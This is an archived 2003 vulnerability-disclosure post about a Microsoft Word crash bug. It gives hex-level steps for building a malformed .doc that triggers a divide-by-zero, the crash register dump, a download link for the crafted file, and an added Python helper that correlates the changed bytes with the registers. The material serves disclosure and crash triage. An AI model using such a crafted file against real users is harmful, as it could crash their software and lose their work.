Vulnerability Development mailing list archives
Bug in Microsoft Word
From: "Bahaa Naamneh" <b_naamneh () hotmail com>
Date: Fri, 03 Oct 2003 20:15:47 +0200
Bug in Microsoft Word

Affected Systems: Microsoft Word 97, 98(J), 2000, 2002
Release Date: September 28, 2003

Technical Description:
=============
The following steps can be performed in order to create a proof of concept Word document:

1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
   These lines were taken from a .doc file of Microsoft Word 2002 (10.2627.3311):

00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------

4. Change them as follows:

00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------

5. Open modified .doc file.
6. Microsoft Word will crash.

Integer Divide by Zero:

30405E1E div eax,edi

EAX = 62626262 EBX = 0091FDC0 ECX = 00008000
EDX = 00000000 ESI = 00000000 EDI = 00000000
EIP = 30405E1E ESP = 001263A8 EBP = 00126EE4
EFL = 00000246

The div command will divide eax by edi. If edi = 0, then anything/0 can't happen.

* The modified .doc file can be downloaded from:
http://www12.brinkster.com/bsecurity/Doc1.doc

Vendor status:
=========
The vendor has been informed.

Discovered by/Credit:
=============
Bahaa Naamneh
b_naamneh () hotmail com
http://www.bsecurity.tk
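Added example, not part of the original post: a small triage helper that diffs the two byte excerpts from steps 3 and 4 and checks whether the changed bytes, read as a little-endian 32-bit value, show up in the crash registers quoted above. The function names are made up for illustration, the byte strings and register values are copied from the post, and offsets are relative to the excerpt, not to the .doc file.

```python
import struct

# Byte excerpts copied from the post (before and after the edit).
ORIGINAL = bytes.fromhex(
    "00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 "
    "00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 "
    "00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00")
MODIFIED = bytes.fromhex(
    "00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 "
    "62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 "
    "00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00")

# Register values copied from the crash dump in the post.
REGISTERS = {"EAX": 0x62626262, "EBX": 0x0091FDC0, "ECX": 0x00008000,
             "EDX": 0, "ESI": 0, "EDI": 0, "EIP": 0x30405E1E,
             "ESP": 0x001263A8, "EBP": 0x00126EE4}

def changed_ranges(a, b):
    """Return half-open (start, end) ranges where two equal-length buffers differ."""
    if len(a) != len(b):
        raise ValueError("buffers must have the same length")
    ranges, start = [], None
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = i
        elif x == y and start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, len(a)))
    return ranges

def correlate(a, b, registers):
    """For each changed range, return (offset, new bytes as hex, dword value, matching registers)."""
    findings = []
    for start, end in changed_ranges(a, b):
        value, hits = None, []
        if end - start == 4:  # only a full dword can be compared with a 32-bit register
            value = struct.unpack_from("<I", b, start)[0]
            hits = sorted(r for r, v in registers.items() if v == value)
        findings.append((start, b[start:end].hex(), value, hits))
    return findings

if __name__ == "__main__":
    for off, raw, value, hits in correlate(ORIGINAL, MODIFIED, REGISTERS):
        shown = "n/a" if value is None else f"0x{value:08X}"
        print(f"excerpt offset {off}: new bytes {raw}, dword {shown}, registers {hits}")
```

The same comparison works on any pair of equal-length buffers, such as a known-good template and a file that crashes a parser, to narrow down which field reached the faulting instruction.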